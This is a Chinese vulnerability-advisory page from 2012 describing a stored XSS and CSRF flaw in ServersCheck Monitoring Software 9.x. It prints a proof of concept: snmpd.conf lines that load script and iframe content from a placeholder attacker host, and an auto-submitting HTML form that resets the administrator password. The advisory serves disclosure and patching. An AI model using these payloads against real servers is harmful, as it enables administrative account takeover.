Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / ServersCheck Monitoring Software脚本插入漏洞

发布日期:2012-10-12
更新日期:2012-10-16受影响系统:
ServersCheck Monitoring Software ServersCheck Monitoring Software 9.x
描述:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software是网络监控和服务器监控软件。ServersCheck Monitoring Software存在安全漏洞,通过"syslocation" 、"syscontact"参数传递的输入没有正确过滤即显示给用户,可被利用插入任意HTML和脚本代码。<*来源:loneferret
 
  链接:http://secunia.com/advisories/50959/
        http://www.exploit-db.com/exploits/21866/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file.
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe># CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<html>
<body onload="trigger()">
<script>
        function trigger() {
                document.getElementById("bad_form").submit();
        }
</script>
<form id="bad_form" method="post" action="http://target:1272/settings2.html">
  <input name="systemsetting" value="secure" type="hidden">
  <input name="setting" value="SECURE" type="hidden">
  <input value="ok" name="changedsettings" type="hidden">
  <input name="systemsetting" value="SECURE" type="hidden">
  <input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
  <input name="adminpass" size="30" value="123456" type="hidden"><br>
</form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:ServersCheck Monitoring Software
--------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.serverscheck.dk/monitoring_software/release.aspProjectPier "upload.php"任意文件上传漏洞MangosWeb Enhanced "Login"字段SQL注入漏洞相关资讯      脚本插入漏洞  ServersCheck Monitoring Software安全漏洞 
  • Raidsonic ICY BOX NAS-4220-B /   (02/26/2013 09:01:26)
  • RoundCube Webmail Larry皮肤邮件  (08/21/2012 06:40:36)
  • HP AssetManager多个脚本插入漏洞  (07/16/2012 21:17:11)
  • ManageEngine ServiceDesk Plus “  (11/20/2012 18:55:35)
  • WinWebMail Server HTML Mail脚本  (08/13/2012 07:05:24)
  • Bricolage多个XSS脚本执行和脚本插  (06/21/2012 06:05:49)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图